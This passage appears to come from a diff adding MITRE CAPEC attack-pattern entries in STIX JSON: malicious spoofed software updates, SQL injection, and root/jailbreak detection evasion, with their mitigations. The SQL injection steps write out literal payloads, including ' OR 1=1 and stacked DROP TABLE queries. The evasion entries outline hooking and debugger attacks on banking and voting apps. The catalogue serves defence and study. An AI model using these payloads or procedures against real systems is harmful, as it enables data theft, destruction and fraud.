Instead, call your Bank, PayPal, eBay, etc., via the number on their public-facing website and inquire about the problem.", + "id": "course-of-action--6e3af87a-42f6-4c03-85e4-aaa333a97b18", + "modified": "2020-12-17T00:00:00.000Z", + "name": "coa-656-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2020-12-17T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--244a5166-f226-4066-b561-6df35600a91c", + "modified": "2020-12-17T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--6e3af87a-42f6-4c03-85e4-aaa333a97b18", + "target_ref": "attack-pattern--ec0a802f-1d0a-4360-a4d8-3fb9f48715d0", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2020-12-17T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An attackers uses identify or content spoofing to trick a client into performing an automated software update from a malicious source. A malicious automated software update that leverages spoofing can include content or identity spoofing as well as protocol spoofing. Content or identity spoofing attacks can trigger updates in software by embedding scripted mechanisms within a malicious web page, which masquerades as a legitimate update source. Scripting mechanisms communicate with software components and trigger updates from locations specified by the attackers' server. 
The result is the client believing there is a legitimate software update available but instead downloading a malicious update from the attacker.", + "external_references": [ + { + "external_id": "CAPEC-657", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/657.html" + }, + { + "external_id": "CWE-494", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/494.html" + }, + { + "description": "Software Deployment Tools", + "external_id": "T1072", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1072" + } + ], + "id": "attack-pattern--9b9760ba-c8de-42c7-9de0-3a5ee2d2abdb", + "modified": "2022-09-29T00:00:00.000Z", + "name": "Malicious Automated Software Update via Spoofing", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_can_follow_refs": [ + "attack-pattern--862d18f1-a87c-4f1b-acc2-882697d5d6e5" + ], + "x_capec_child_of_refs": [ + "attack-pattern--3c9e7b88-a1eb-4cfd-aa34-10df08b23317" + ], + "x_capec_consequences": { + "Access_Control": [ + "Execute Unauthorized Commands" + ], + "Availability": [ + "Execute Unauthorized Commands" + ], + "Confidentiality": [ + "Execute Unauthorized Commands" + ] + }, + "x_capec_domains": [ + "Supply Chain", + "Software" + ], + "x_capec_example_instances": [ + "An example of the spoofing strategy would be the eTrust Antivirus Webscan Automated Update Remote Code Execution vulnerability (CVE-2006-3976) and (CVE-2006-3977) whereby an ActiveX control could be remotely manipulated by an attacker controlled web page to download and execute the attackers' code without integrity checking." 
+ ], + "x_capec_likelihood_of_attack": "High", + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "This attack exploits target software that constructs SQL statements based on user input. An attacker crafts input strings so that when the target software constructs SQL statements based on the input, the resulting SQL statement performs actions other than those the application intended. SQL Injection results from failure of the application to appropriately validate input.", + "external_references": [ + { + "external_id": "CAPEC-66", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/66.html" + }, + { + "external_id": "CWE-89", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/89.html" + }, + { + "external_id": "CWE-1286", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/1286.html" + }, + { + "description": "SQL Injection", + "external_id": "19", + "source_name": "WASC", + "url": "http://projects.webappsec.org/SQL-Injection" + }, + { + "description": "SQL Injection", + "source_name": "OWASP Attacks", + "url": "https://owasp.org/www-community/attacks/SQL_Injection" + }, + { + "description": "OWASP Web Security Testing Guide, The Open Web Application Security Project (OWASP)", + "external_id": "REF-607", + "source_name": "reference_from_CAPEC", + "url": "https://owasp.org/www-project-web-security-testing-guide/latest/4-Web_Application_Security_Testing/07-Input_Validation_Testing/05-Testing_for_SQL_Injection.html" + } + ], + "id": "attack-pattern--42acc604-a86c-46f7-bd03-6e532c02d85e", + "modified": "2022-02-22T00:00:00.000Z", + "name": "SQL Injection", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + 
"x_capec_child_of_refs": [ + "attack-pattern--2fb2b2b8-b7de-45a2-aadb-5849d12fda8f" + ], + "x_capec_consequences": { + "Access_Control": [ + "Gain Privileges" + ], + "Authorization": [ + "Gain Privileges" + ], + "Availability": [ + "Execute Unauthorized Commands (Run Arbitrary Code)" + ], + "Confidentiality": [ + "Read Data", + "Execute Unauthorized Commands (Run Arbitrary Code)", + "Gain Privileges" + ], + "Integrity": [ + "Modify Data", + "Execute Unauthorized Commands (Run Arbitrary Code)" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_example_instances": [ + "With PHP-Nuke versions 7.9 and earlier, an attacker can successfully access and modify data, including sensitive contents such as usernames and password hashes, and compromise the application through SQL Injection. The protection mechanism against SQL Injection employs a denylist approach to input validation. However, because of an improper denylist, it is possible to inject content such as \"foo'/**/UNION\" or \"foo UNION/**/\" to bypass validation and glean sensitive information from the database. See also: CVE-2006-5525" + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Survey application: The attacker first takes an inventory of the functionality exposed by the application.

  2. Techniques
    Spider web sites for all available links
    Sniff network communications with application using a utility such as WireShark.

Experiment

  1. Determine user-controllable input susceptible to injection: Determine the user-controllable input susceptible to injection. For each user-controllable input that the attacker suspects is vulnerable to SQL injection, attempt to inject characters that have special meaning in SQL (such as a single quote character, a double quote character, two hyphens, a parenthesis, etc.). The goal is to create a SQL query with an invalid syntax.

  2. Techniques
    Use web browser to inject input through text fields or through HTTP GET parameters.
    Use a web application debugging tool such as Tamper Data, TamperIE, WebScarab,etc. to modify HTTP POST parameters, hidden fields, non-freeform fields, etc.
    Use network-level packet injection tools such as netcat to inject input
    Use modified client (modified by reverse engineering) to inject input.
  3. Experiment with SQL Injection vulnerabilities: After determining that a given input is vulnerable to SQL Injection, hypothesize what the underlying query looks like. Iteratively try to add logic to the query to extract information from the database, or to modify or delete information in the database.

  4. Techniques
    Use public resources such as \"SQL Injection Cheat Sheet\" at http://ferruh.mavituna.com/makale/sql-injection-cheatsheet/, and try different approaches for adding logic to SQL queries.
    Add logic to query, and use detailed error messages from the server to debug the query. For example, if adding a single quote to a query causes an error message, try : \"' OR 1=1; --\", or something else that would syntactically complete a hypothesized query. Iteratively refine the query.
    Use \"Blind SQL Injection\" techniques to extract information about the database schema.
    If a denial of service attack is the goal, try stacking queries. This does not work on all platforms (most notably, it does not work on Oracle or MySQL). Examples of inputs to try include: \"'; DROP TABLE SYSOBJECTS; --\" and \"'); DROP TABLE SYSOBJECTS; --\". These particular queries will likely not work because the SYSOBJECTS table is generally protected.

Exploit

  1. Exploit SQL Injection vulnerability: After refining and adding various logic to SQL queries, craft and execute the underlying SQL query that will be used to attack the target system. The goal is to reveal, modify, and/or delete database data, using the knowledge obtained in the previous step. This could entail crafting and executing multiple SQL queries if a denial of service attack is the intent.

  2. Techniques
    Craft and Execute underlying SQL query
", + "x_capec_extended_description": "\n When specially crafted user-controlled input consisting of SQL syntax is used without proper validation as part of SQL queries, it is possible to glean information from the database in ways not envisaged during application design. Depending upon the database and the design of the application, it may also be possible to leverage injection to have the database execute system-related commands of the attackers' choice. SQL Injection enables an attacker to interact directly to the database, thus bypassing the application completely. Successful injection can cause information disclosure as well as ability to add or modify data in the database.\n ", + "x_capec_likelihood_of_attack": "High", + "x_capec_parent_of_refs": [ + "attack-pattern--89acf77d-723b-43b4-b66d-6eaafed52369", + "attack-pattern--f0e32d0e-9580-4b79-95e0-6e3b99bf6e45", + "attack-pattern--7c90bef7-530c-427b-8fb7-f9d3eda9c26a", + "attack-pattern--35bde6ec-0a19-462c-92b4-9c481dc4986e", + "attack-pattern--9116da7f-a60e-4186-b42a-218f1b0eb269" + ], + "x_capec_prerequisites": [ + "SQL queries used by the application to store, retrieve or modify data.", + "User-controllable input that is not properly validated by the application as part of SQL queries." + ], + "x_capec_resources_required": [ + "None: No specialized resources are required to execute this type of attack." + ], + "x_capec_skills_required": { + "Low": "It is fairly simple for someone with basic SQL knowledge to perform SQL injection, in general. In certain instances, however, specific knowledge of the database employed may be required." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Strong input validation - All user-controllable input must be validated and filtered for illegal characters as well as SQL content. 
Keywords such as UNION, SELECT or INSERT must be filtered in addition to characters such as a single-quote(') or SQL-comments (--) based on the context in which they appear.", + "id": "course-of-action--07cbed26-8c96-41e6-a239-7be587a38673", + "modified": "2022-02-22T00:00:00.000Z", + "name": "coa-66-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--a93f8f1b-9607-4383-9b6f-7be3de09fc48", + "modified": "2022-02-22T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--07cbed26-8c96-41e6-a239-7be587a38673", + "target_ref": "attack-pattern--42acc604-a86c-46f7-bd03-6e532c02d85e", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Use of parameterized queries or stored procedures - Parameterization causes the input to be restricted to certain domains, such as strings or integers, and any input outside such domains is considered invalid and the query fails. 
Note that SQL Injection is possible even in the presence of stored procedures if the eventual query is constructed dynamically.", + "id": "course-of-action--3b3ecd49-a48b-4908-b854-071ac6b15f1c", + "modified": "2022-02-22T00:00:00.000Z", + "name": "coa-66-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--5fc50ca5-d17c-4f39-96d4-795ef6ac0bb1", + "modified": "2022-02-22T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--3b3ecd49-a48b-4908-b854-071ac6b15f1c", + "target_ref": "attack-pattern--42acc604-a86c-46f7-bd03-6e532c02d85e", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--df5e28f8-bb74-4412-960d-bef6cec27c9f", + "modified": "2022-02-22T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--618c2d85-ca76-40a0-a019-0ac9ba1b0989", + "target_ref": "attack-pattern--42acc604-a86c-46f7-bd03-6e532c02d85e", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2020-12-17T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary forces a non-restricted mobile application to load arbitrary code or code files, via Hooking, with the goal of evading Root/Jailbreak detection. 
Mobile device users often Root/Jailbreak their devices in order to gain administrative control over the mobile operating system and/or to install third-party mobile applications that are not provided by authorized application stores (e.g. Google Play Store and Apple App Store). Adversaries may further leverage these capabilities to escalate privileges or bypass access control on legitimate applications. Although many mobile applications check if a mobile device is Rooted/Jailbroken prior to authorized use of the application, adversaries may be able to \"hook\" code in order to circumvent these checks. Successfully evading Root/Jailbreak detection allows an adversary to execute administrative commands, obtain confidential data, impersonate legitimate users of the application, and more.", + "external_references": [ + { + "external_id": "CAPEC-660", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/660.html" + }, + { + "external_id": "CWE-829", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/829.html" + }, + { + "description": "Process Injection", + "external_id": "T1055", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1055" + }, + { + "description": "Ansgar Kellner, Micha Horlboge, Konrad Rieck, Christian Wressnegger, False Sense of Security: A Study on the Effectivity of Jailbreak Detection in Banking Apps, 2019--06---17, Technische Universität Braunschweig", + "external_id": "REF-624", + "source_name": "reference_from_CAPEC", + "url": "https://cybersecurity.att.com/blogs/security-essentials/mobile-phishing" + }, + { + "description": "San-Tsai Sun, Andrea Cuadros, Konstantin Beznosov, Android Rooting: Methods, Detection, and Evasion, 2019--06---17, Technische Universität Braunschweig", + "external_id": "REF-625", + "source_name": "reference_from_CAPEC", + "url": "http://lersse-dl.ece.ubc.ca/record/310/files/p3.pdf?subformat=pdfa" + }, + { + "description": "Jose Lopes, Who owns your 
runtime?, 2015--10---12, Nettitude Labs", + "external_id": "REF-626", + "source_name": "reference_from_CAPEC", + "url": "https://labs.nettitude.com/blog/ios-and-android-runtime-and-anti-debugging-protections/#hooking" + }, + { + "description": "Suresh Khutale, Android Root Detection Bypass by Reverse Engineering APK, 2018--03---06, InfoSec Institute", + "external_id": "REF-627", + "source_name": "reference_from_CAPEC", + "url": "https://resources.infosecinstitute.com/topic/android-root-detection-bypass-reverse-engineering-apk/" + } + ], + "id": "attack-pattern--fa4feb09-657b-40a0-9edd-6187b55047e3", + "modified": "2020-12-17T00:00:00.000Z", + "name": "Root/Jailbreak Detection Evasion via Hooking", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_can_follow_refs": [ + "attack-pattern--80649f3c-d2f3-4703-9e78-e096673a7517" + ], + "x_capec_child_of_refs": [ + "attack-pattern--283d665d-e109-4d5d-8993-6fb25e5923d6" + ], + "x_capec_consequences": { + "Access_Control": [ + "Read Data (An adversary may leverage Root/Jailbreak Detection Evasion via Hooking in order to obtain sensitive information.)" + ], + "Authorization": [ + "Execute Unauthorized Commands (Through Root/Jailbreak Detection Evasion via Hooking, the adversary compromises the integrity of the application.)", + "Gain Privileges" + ], + "Confidentiality": [ + "Gain Privileges", + "Read Data (An adversary may leverage Root/Jailbreak Detection Evasion via Hooking in order to obtain sensitive information.)" + ], + "Integrity": [ + "Execute Unauthorized Commands (Through Root/Jailbreak Detection Evasion via Hooking, the adversary compromises the integrity of the application.)" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_example_instances": [ + "An adversary targets a non-restricted iOS banking application in an attempt to compromise sensitive user data. 
The adversary creates Objective-C runtime code that always returns \"false\" when checking for the existence of the Cydia application. The malicious code is then dynamically loaded into the application via the DYLD_INSERT_LIBRARIES environment variable. When the banking applications checks for Cydia, the hooked code returns \"false\", so the application assumes the device is stock (i.e. not Jailbroken) and allows it to access the application. However, the adversary has just evaded Jailbreak detection and is now able to glean user credentials and/or transaction details.", + "An adversary targets a mobile voting application on an Android device with the goal of committing voter fraud. Leveraging the Xposed framework, the adversary is able to create and hook Java code into the application that bypasses Root detection methods. When the voting application attempts to detect a Rooted device by checking for commonly known installed packages associated with Rooting, the hooked code removes the suspicious packages before returning to the application. As a result, the application believes the device is stock (i.e. not Rooted) when in actuality this is not the case. Having evading Root detection, the adversary is now able to cast votes for the candidate of their choosing as a variety of different users." + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Identify application with attack potential: The adversary searches for and identifies a mobile application that could be exploited for malicious purposes (e.g. banking, voting, or medical applications).

  2. Techniques
    Search application stores for mobile applications worth exploiting

Experiment

  1. Develop code to be hooked into chosen target application: The adversary develops code or leverages existing code that will be hooked into the target application in order to evade Root/Jailbreak detection methods.

  2. Techniques
    Develop code or leverage existing code to bypass Root/Jailbreak detection methods.
    Test the code to see if it works.
    Iteratively develop the code until Root/Jailbreak detection methods are evaded.

Exploit

  1. Execute code hooking to evade Root/Jailbreak detection methods: Once hooking code has been developed or obtained, execute the code against the target application to evade Root/Jailbreak detection methods.

  2. Techniques
    Hook code into the target application.
", + "x_capec_likelihood_of_attack": "Medium", + "x_capec_prerequisites": [ + "The targeted application must be non-restricted to allow code hooking." + ], + "x_capec_resources_required": [ + "The adversary must have a Rooted/Jailbroken mobile device.", + "The adversary needs to have enough access to the target application to control the included code or file." + ], + "x_capec_skills_required": { + "High": "Knowledge about Root/Jailbreak detection and evasion techniques.", + "Medium": "Knowledge about code hooking." + }, + "x_capec_status": "Stable", + "x_capec_typical_severity": "Very High", + "x_capec_version": "3.9" + }, + { + "created": "2020-12-17T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Ensure mobile applications are signed appropriately to avoid code inclusion via hooking.", + "id": "course-of-action--a26576b7-5508-45c7-b841-988783c129d3", + "modified": "2020-12-17T00:00:00.000Z", + "name": "coa-660-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2020-12-17T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--3ed05e0f-72dd-495e-af10-e186067c014b", + "modified": "2020-12-17T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--a26576b7-5508-45c7-b841-988783c129d3", + "target_ref": "attack-pattern--fa4feb09-657b-40a0-9edd-6187b55047e3", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2020-12-17T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Inspect the application's memory for suspicious artifacts, such as shared objects/JARs or dylibs, after other Root/Jailbreak detection methods.", + "id": 
"course-of-action--ab5ae276-92d5-4d92-8409-8a4400de6800", + "modified": "2020-12-17T00:00:00.000Z", + "name": "coa-660-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2020-12-17T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--66be5c7d-d8d0-490b-93f7-33a6b9a2ee47", + "modified": "2020-12-17T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--ab5ae276-92d5-4d92-8409-8a4400de6800", + "target_ref": "attack-pattern--fa4feb09-657b-40a0-9edd-6187b55047e3", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2020-12-17T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Inspect the application's stack trace for suspicious method calls.", + "id": "course-of-action--43850af6-9f1d-4bb9-a858-9d516bf243f7", + "modified": "2020-12-17T00:00:00.000Z", + "name": "coa-660-2", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2020-12-17T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--625a5ed4-6a77-4589-80db-7eb242928389", + "modified": "2020-12-17T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--43850af6-9f1d-4bb9-a858-9d516bf243f7", + "target_ref": "attack-pattern--fa4feb09-657b-40a0-9edd-6187b55047e3", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2020-12-17T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + 
"description": "Allow legitimate native methods, and check for non-allowed native methods during Root/Jailbreak detection methods.", + "id": "course-of-action--d8677776-34d9-4dae-add9-a6e12cfc342e", + "modified": "2020-12-17T00:00:00.000Z", + "name": "coa-660-3", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2020-12-17T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--6aaf6432-9f26-4d24-9622-96e8a784c382", + "modified": "2020-12-17T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--d8677776-34d9-4dae-add9-a6e12cfc342e", + "target_ref": "attack-pattern--fa4feb09-657b-40a0-9edd-6187b55047e3", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2020-12-17T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "For iOS applications, ensure application methods do not originate from outside of Apple's SDK.", + "id": "course-of-action--70e9b054-c49a-4250-8674-4d37b0ae027a", + "modified": "2020-12-17T00:00:00.000Z", + "name": "coa-660-4", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2020-12-17T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--ad5e1d79-01e2-4822-81ba-6cd81c7049e7", + "modified": "2020-12-17T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--70e9b054-c49a-4250-8674-4d37b0ae027a", + "target_ref": "attack-pattern--fa4feb09-657b-40a0-9edd-6187b55047e3", + "type": 
"relationship", + "x_capec_version": "3.9" + }, + { + "created": "2020-12-17T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary inserts a debugger into the program entry point of a mobile application to modify the application binary, with the goal of evading Root/Jailbreak detection. Mobile device users often Root/Jailbreak their devices in order to gain administrative control over the mobile operating system and/or to install third-party mobile applications that are not provided by authorized application stores (e.g. Google Play Store and Apple App Store). Rooting/Jailbreaking a mobile device also provides users with access to system debuggers and disassemblers, which can be leveraged to exploit applications by dumping the application's memory at runtime in order to remove or bypass signature verification methods. This further allows the adversary to evade Root/Jailbreak detection mechanisms, which can result in execution of administrative commands, obtaining confidential data, impersonating legitimate users of the application, and more.", + "external_references": [ + { + "external_id": "CAPEC-661", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/661.html" + }, + { + "external_id": "CWE-489", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/489.html" + }, + { + "description": "San-Tsai Sun, Andrea Cuadros, Konstantin Beznosov, Android Rooting: Methods, Detection, and Evasion, 2019--06---17, Technische Universität Braunschweig", + "external_id": "REF-625", + "source_name": "reference_from_CAPEC", + "url": "http://lersse-dl.ece.ubc.ca/record/310/files/p3.pdf?subformat=pdfa" + }, + { + "description": "Jose Lopes, Who owns your runtime?, 2015--10---12, Nettitude Labs", + "external_id": "REF-626", + "source_name": "reference_from_CAPEC", + "url": "https://labs.nettitude.com/blog/ios-and-android-runtime-and-anti-debugging-protections/#hooking" + }, + { + 
"description": "Suresh Khutale, Android Root Detection Bypass by Reverse Engineering APK, 2018--03---06, InfoSec Institute", + "external_id": "REF-627", + "source_name": "reference_from_CAPEC", + "url": "https://resources.infosecinstitute.com/topic/android-root-detection-bypass-reverse-engineering-apk/" + }, + { + "description": "Manuel Egele, Christopher Kruegel, Engin Kirda, Giovanni Vigna, PiOS: Detecting Privacy Leaks in iOS Applications, 2011--02---09", + "external_id": "REF-628", + "source_name": "reference_from_CAPEC", + "url": "https://www.ndss-symposium.org/wp-content/uploads/2017/09/egel.pdf" + } + ], + "id": "attack-pattern--80649f3c-d2f3-4703-9e78-e096673a7517", + "modified": "2020-12-17T00:00:00.000Z", + "name": "Root/Jailbreak Detection Evasion via Debugging", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_can_precede_refs": [ + "attack-pattern--2b8d7aaf-bd4b-424f-8df4-6d0f37b72f4b", + "attack-pattern--fa4feb09-657b-40a0-9edd-6187b55047e3" + ], + "x_capec_child_of_refs": [ + "attack-pattern--b289975f-c5e0-4d27-bf50-5937bfd02cfd" + ], + "x_capec_consequences": { + "Access_Control": [ + "Read Data (An adversary may leverage Root/Jailbreak Detection Evasion via Debugging in order to obtain sensitive information.)" + ], + "Authorization": [ + "Execute Unauthorized Commands (Through Root/Jailbreak Detection Evasion via Debugging, the adversary compromises the integrity of the application.)", + "Gain Privileges" + ], + "Confidentiality": [ + "Gain Privileges", + "Read Data (An adversary may leverage Root/Jailbreak Detection Evasion via Debugging in order to obtain sensitive information.)" + ], + "Integrity": [ + "Execute Unauthorized Commands (Through Root/Jailbreak Detection Evasion via Debugging, the adversary compromises the integrity of the application.)" + ] + }, + "x_capec_domains": [ + "Software", + "Hardware" + ], + 
"x_capec_example_instances": [ + "An adversary targets an iOS banking application in an attempt to compromise sensitive user data. The adversary launches the application with the iOS debugger and sets a breakpoint at the program entry point, after the application's signature has been verified. Next, the adversary dumps the memory region that contains the decrypted code from the address space of the binary. The 'Restrict' flag is then stripped from the application and the adversary resigns the application with a self-signed certificate. The application is now executed without the 'Restrict' flag, while trusting the self-signed certificate to be legitimate. However, the adversary is now able to evaded Jailbreak detection via code hooking or other methods and can glean user credentials and/or transaction details." + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Identify application with attack potential: The adversary searches for and identifies a mobile application that could be exploited for malicious purposes (e.g. banking, voting, or medical applications).

  2. Techniques
    Search application stores for mobile applications worth exploiting

Experiment

  1. Debug the target application: The adversary inserts the debugger into the program entry point of the mobile application, after the application's signature has been identified, to dump its memory contents.

  2. Techniques
    Insert the debugger at the mobile application's program entry point, after the application's signature has been identified.
    Dump the memory region containing the now decrypted code from the address space of the binary.
  3. Remove application signature verification methods: Remove signature verification methods from the decrypted code and resign the application with a self-signed certificate.

Exploit

  1. Execute the application and evade Root/Jailbreak detection methods: The application executes with the self-signed certificate, while believing it contains a trusted certificate. This now allows the adversary to evade Root/Jailbreak detection via code hooking or other methods.

  2. Techniques
    Optional: Hook code into the target application.
", + "x_capec_likelihood_of_attack": "Medium", + "x_capec_prerequisites": [ + "A debugger must be able to be inserted into the targeted application." + ], + "x_capec_resources_required": [ + "The adversary must have a Rooted/Jailbroken mobile device with debugging capabilities." + ], + "x_capec_skills_required": { + "High": "Knowledge about Root/Jailbreak detection and evasion techniques.", + "Medium": "Knowledge about runtime debugging." + }, + "x_capec_status": "Stable", + "x_capec_typical_severity": "Very High", + "x_capec_version": "3.9" + }, + { + "created": "2020-12-17T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Instantiate checks within the application code that ensures debuggers are not attached.", + "id": "course-of-action--218e7e1a-8c49-418c-9bf7-f465a1ee8d93", + "modified": "2020-12-17T00:00:00.000Z", + "name": "coa-661-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2020-12-17T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--cfe13500-1996-47bc-b16c-88e763f8de3d", + "modified": "2020-12-17T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--218e7e1a-8c49-418c-9bf7-f465a1ee8d93", + "target_ref": "attack-pattern--80649f3c-d2f3-4703-9e78-e096673a7517", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2021-06-24T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "\n An adversary exploits security vulnerabilities or inherent functionalities of a web browser, in order to manipulate traffic between two endpoints.\n ", + "external_references": [ + { + "external_id": "CAPEC-662", + "source_name": "capec", + "url": 
